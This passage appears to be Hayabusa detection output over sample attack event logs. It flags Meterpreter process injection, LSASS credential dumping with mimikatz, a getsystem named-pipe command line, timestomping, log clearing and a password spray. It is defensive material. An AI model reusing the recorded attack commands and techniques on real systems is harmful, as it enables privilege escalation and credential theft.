User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2500 | Tgt PGUID: 365ABB72-F787-5CC7-0000-001068B30A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\conhost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2024 | Tgt PGUID: 365ABB72-F787-5CC7-0000-0010FBB30A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\mmc.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2352 | Tgt PGUID: 
365ABB72-F797-5CC7-0000-00105AF70A00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\taskeng.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1236 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010B31E0E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\launcher.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3712 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010D0220E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3624 | Tgt PGUID: 365ABB72-F7D0-5CC7-0000-0010DF2F0E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Users\IEUser\AppData\Local\Programs\Opera\60.0.3255.70\opera_autoupdate.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 
0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 3504 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010AF380E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\wbem\wmiprvse.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2144 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-0010CE400E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,low,,Process Access,Src Process: D:\m.exe | Tgt Process: C:\Windows\system32\DllHost.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 1344 | Tgt PGUID: 365ABB72-F7D1-5CC7-0000-001058500E00,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:23:00.930 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_meterpreter_ps_cmd_process_listing_sysmon_10.evtx +2019-04-30 16:26:34.133 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: \\vboxsrv\HTools\m.exe | Tgt Process: C:\Windows\explorer.exe | Src PID: 3772 | Src PGUID: 365ABB72-F7C9-5CC7-0000-0010BF010E00 | Tgt PID: 2812 | Tgt PGUID: 365ABB72-F6C9-5CC7-0000-0010135F0600,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/meterpreter_migrate_to_explorer_sysmon_8.evtx +2019-04-30 16:46:15.215 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /c echo msdhch > \\.\pipe\msdhch | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 4088 | PGUID: 365ABB72-FD47-5CC7-0000-00106AF61D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,PrivEsc,Meterpreter or Cobalt Strike Getsystem Service Start,,rules/sigma/process_creation/proc_creation_win_meterpreter_or_cobaltstrike_getsystem_service_start.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege 
Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 16:46:15.215 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 16:46:15.215 +09:00,IEWIN7,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/sysmon_13_1_meterpreter_getsystem_NamedPipeImpersonation.evtx +2019-04-30 19:12:45.583 +09:00,IEWIN7,11,info,,File Created,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bs.ps1 | Process: C:\Windows\system32\cmd.exe | PID: 3292 | PGUID: 365ABB72-1EFA-5CC8-0000-0010D3DE1C00,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_2_11_evasion_timestomp_MACE.evtx +2019-04-30 19:13:42.052 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bs.ps1 | Process: C:\Windows\Explorer.EXE | CreationUtcTime: 2016-02-02 15:30:02.000 | PreviousCreationUtcTime: 2019-04-30 10:12:45.583 | PID: %PID% | PGUID: 365ABB72-16CD-5CC8-0000-0010483A0600,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_2_11_evasion_timestomp_MACE.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00107E590000,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\smss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 264 | Tgt PGUID: 365ABB72-3FDE-5CC8-0000-0010142B0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,8,medium,,Process Injection,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00107E590000,rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 336 | Tgt PGUID: 365ABB72-3FDF-5CC8-0000-00103C480000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\csrss.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 384 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-0010014C0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\wininit.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 392 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00101E4C0000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\winlogon.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 440 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00104D520000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\services.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 468 | Tgt PGUID: 365ABB72-3FE0-5CC8-0000-00100D550000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,low,,Process Access,Src Process: \\VBOXSVR\HTools\voice_mail.msg.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1f1fff | Src PID: 1532 | Src PGUID: 365ABB72-4055-5CC8-0000-0010769D0B00 | Tgt PID: 492 | Tgt PGUID: 
365ABB72-3FE0-5CC8-0000-00107E590000,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,CredAccess,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,8,high,CredAccess,Password Dumper Remote Thread in LSASS,,rules/sigma/create_remote_thread/sysmon_password_dumper_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,high,CredAccess,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module 
Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-04-30 21:43:43.784 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_sysmon_hashdump_cmd_meterpreter.evtx +2019-05-01 03:08:22.618 +09:00,Sec504Student,1102,high,Evas,Security Log Cleared,User: Sec504,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 
0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,medium,CredAccess | Impact,Process Ran With High Privilege,Process: C:\Tools\mimikatz\mimikatz.exe | User: Sec504 | LID: 0x1e3dd,rules/hayabusa/default/alerts/Security/4673_Multiple_UnknownProcessUsedHighPrivilege.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 03:08:29.138 +09:00,Sec504Student,4673,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/mimikatz-privesc-hashdump.evtx +2019-05-01 04:27:00.297 +09:00,DESKTOP-JR78RLP,1102,high,Evas,Security Log Cleared,User: jwrig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:02.847 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: Administrator | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:02.847 +09:00,-,-,medium,CredAccess,Password Spray,[condition] count(TargetUserName) by IpAddress >= 5 in timeframe [result] count:41 TargetUserName:wstrzelec/zmathis/lpesce/psmith/lschifano/sanson/sarmstrong/drook/bgalbraith/melliott/bhostetler/edygert/ebooth/jleytevidal/jorchilles/bking/cdavis/jwright/celgee/jlake/gsalinas/jkulikowski/mdouglas/dpendolino/thessman/cfleener/cspizor/rbowes/bgreenwood/cmoody/mtoussain/eskoudis/smisenar/kperryman/cragoso/ssims/Administrator/dmashburn/baker/tbennett/econrad IpAddress:172.16.144.128 timeframe:5m,rules/hayabusa/default/alerts/Security/4648_BruteForce_PasswordSprayDetect.yml,- +2019-05-01 04:27:03.925 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: jwright | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:05.020 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: dpendolino | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:06.085 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: celgee | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:07.171 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: thessman | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:08.254 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: eskoudis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:09.323 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cdavis | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:10.377 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: mtoussain | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:11.465 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: lschifano | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:12.549 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: bhostetler | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:13.611 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: rbowes | IP Address: 172.16.144.128 | Process: | Target Server: 
DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:14.687 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: ebooth | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:15.750 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: jwrig | Target User: cfleener | IP Address: 172.16.144.128 | Process: | Target Server: DESKTOP-JR78RLP,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/password-spray.evtx +2019-05-01 04:27:16.841 +09:00,DESKTOP-JR78RLP,4648,info,PrivEsc | LatMov,Explicit 